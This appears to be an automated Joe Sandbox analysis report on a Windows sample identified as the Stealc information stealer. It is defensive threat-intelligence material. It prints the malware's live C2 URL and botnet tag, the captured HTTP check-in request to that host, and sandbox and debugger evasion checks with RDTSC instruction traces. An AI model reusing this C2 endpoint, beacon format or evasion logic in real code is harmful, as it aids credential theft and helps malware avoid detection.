Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542946
MD5:aa9612d185f329e0f4b0a9525de3b0e1
SHA1:21ad52db3ebef421c02c82070c1ee13ad6c03620
SHA256:c732cac1942cf6a53dbad592bd7599b3410b8f9f090f79060ddd0f6e4d3abd6b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AA9612D185F329E0F4B0A9525DE3B0E1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7048JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7048JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.910000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-26T23:15:08.696725+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.910000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0091C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00919AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00919AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00917240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00917240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00919B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00919B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00928EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00924910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0091DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0091E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0091ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00924570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00923EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0091BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 39 43 39 34 31 35 34 36 39 36 39 36 36 30 36 35 39 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="hwid"3D9C9415469696606590------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build"puma------GCFIIEBKEGHJJJJJJDAA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00914880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 39 43 39 34 31 35 34 36 39 36 39 36 36 30 36 35 39 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="hwid"3D9C9415469696606590------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build"puma------GCFIIEBKEGHJJJJJJDAA--
                Source: file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1786322649.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/DCBF360B3297E19BA487R
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpF
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpP
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpZ
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php~
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/lC
                Source: file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A20_2_00CDA8A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CED01D0_2_00CED01D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDD0320_2_00CDD032
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE818B0_2_00CE818B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C369370_2_00C36937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D83A550_2_00D83A55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE4A7C0_2_00CE4A7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA7A650_2_00BA7A65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD63EB0_2_00CD63EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEBCC10_2_00CEBCC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDFC240_2_00CDFC24
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C07C350_2_00C07C35
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDDDDC0_2_00CDDDDC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD753A0_2_00CD753A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD8EAF0_2_00CD8EAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBFE5E0_2_00CBFE5E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C51E090_2_00C51E09
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009145C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qyeleazo ZLIB complexity 0.99490058910162
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00928680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00923720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00923720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\CK3S1OV1.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1894400 > 1048576
                Source: file.exeStatic PE information: Raw size of qyeleazo is bigger than: 0x100000 < 0x1a8600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qyeleazo:EW;wadukluq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qyeleazo:EW;wadukluq:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00929860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d1e52 should be: 0x1d439d
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qyeleazo
                Source: file.exeStatic PE information: section name: wadukluq
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBF0CA push 0EF14A9Bh; mov dword ptr [esp], eax0_2_00DBF115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D560C1 push 5EB4D8F6h; mov dword ptr [esp], ecx0_2_00D56104
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAF8F7 push 6FA4CDE1h; mov dword ptr [esp], ebx0_2_00DAF909
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D56884 push edx; mov dword ptr [esp], esi0_2_00D568A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5A8BF push ebx; mov dword ptr [esp], ecx0_2_00D5A946
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push eax; mov dword ptr [esp], ebp0_2_00CDA952
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 2FBD9A26h; mov dword ptr [esp], edx0_2_00CDA95A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 2F31678Ah; mov dword ptr [esp], eax0_2_00CDA9AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push edx; mov dword ptr [esp], esi0_2_00CDA9FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 6CFC02C6h; mov dword ptr [esp], ecx0_2_00CDAA0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push eax; mov dword ptr [esp], ecx0_2_00CDAA27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 710E47B8h; mov dword ptr [esp], edi0_2_00CDAA83
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push esi; mov dword ptr [esp], 7514F3DDh0_2_00CDAA9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push ecx; mov dword ptr [esp], 3F8F3291h0_2_00CDAAA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push esi; mov dword ptr [esp], edi0_2_00CDAAF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 75823B78h; mov dword ptr [esp], edi0_2_00CDAB4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 65B70D32h; mov dword ptr [esp], edi0_2_00CDABCB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push edi; mov dword ptr [esp], esi0_2_00CDAC07
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 143BF9E2h; mov dword ptr [esp], edx0_2_00CDACA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push ebx; mov dword ptr [esp], 7F0EB2D6h0_2_00CDAD4E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push ebp; mov dword ptr [esp], eax0_2_00CDAE6D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 7DDA32EFh; mov dword ptr [esp], eax0_2_00CDAE7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push eax; mov dword ptr [esp], edi0_2_00CDAEB1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push edi; mov dword ptr [esp], esi0_2_00CDAEDD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 2155D56Fh; mov dword ptr [esp], ecx0_2_00CDAF11
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 3220720Fh; mov dword ptr [esp], ebp0_2_00CDAF1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push ecx; mov dword ptr [esp], 7FAFA64Eh0_2_00CDAFA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push edx; mov dword ptr [esp], edi0_2_00CDAFE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 4C5B5C61h; mov dword ptr [esp], eax0_2_00CDB02A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push 6C328581h; mov dword ptr [esp], ecx0_2_00CDB05E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDA8A2 push esi; mov dword ptr [esp], eax0_2_00CDB154
                Source: file.exeStatic PE information: section name: qyeleazo entropy: 7.954246501393021

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00929860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13594
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71989 second address: B7198E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7198E second address: B719A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0C44DA3FE8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF232E second address: CF2338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0C44EBA8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF2338 second address: CF233C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF13CE second address: CF13D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF13D4 second address: CF13D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF16AC second address: CF16BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F0C44EBA8E6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF16BC second address: CF16CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
